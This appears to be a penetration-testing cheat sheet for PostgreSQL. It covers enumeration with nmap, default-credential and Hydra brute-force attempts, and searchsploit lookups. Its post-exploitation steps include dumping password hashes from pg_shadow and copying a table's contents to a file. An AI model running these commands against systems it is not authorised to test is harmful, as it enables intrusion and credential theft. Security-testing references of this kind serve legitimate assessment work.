PostgreSQL
Default Port: 5432
PostgreSQL, also known as Postgres, is a powerful open-source object-relational database system. It has earned a strong reputation for its proven architecture, reliability, data integrity, robust feature set, and extensibility.
Connect
Connect with psql
psql -h <target-host> -p <port> -U <username> -W
Enumeration
Identify PostgreSQL
To identify the presence of PostgreSQL, nmap can be quite handy:
nmap -sV -p 5432 <target-host>
This scans for open PostgreSQL services running on their default port (5432) and attempts to determine the version.
Version Enumeration
Knowing the version of PostgreSQL can give insights into specific vulnerabilities:
nmap -sV --script=postgresql-info -p 5432 <target-host>
Attack Vectors
Default Credentials
Many PostgreSQL installations use default or weak credentials. Attempt to log in using common defaults like postgres for both username and password.
Brute Forcing Credentials with Hydra
Before gaining access, it might be necessary to brute force credentials. Tools like Hydra can help in this regard:
hydra -L userlist.txt -P passlist.txt <target-ip> postgres
Exploiting Known Vulnerabilities
Check for publicly known vulnerabilities in the specific PostgreSQL version using tools like searchsploit:
searchsploit postgresql <version>
Post-Exploitation
Enumerating Databases and Tables
Upon gaining access, enumerating the databases and tables helps in understanding the structure and finding sensitive information.
List all databases
\l
Switch to a database
\c <database_name>
List tables in the current database:
\dt
Extract data from a specific table:
SELECT * FROM <table_name>;
Dumping Hashes
SELECT usename, passwd FROM pg_shadow;
These hashes can be attempted to crack with tools like John The Ripper or hashcat.
Accessing File System
PostgreSQL can interact with the underlying file system. With enough privileges, an attacker could read or write files, depending on the database’s permissions:
COPY (SELECT * FROM sensitive_table) TO '/tmp/sensitive_data.txt';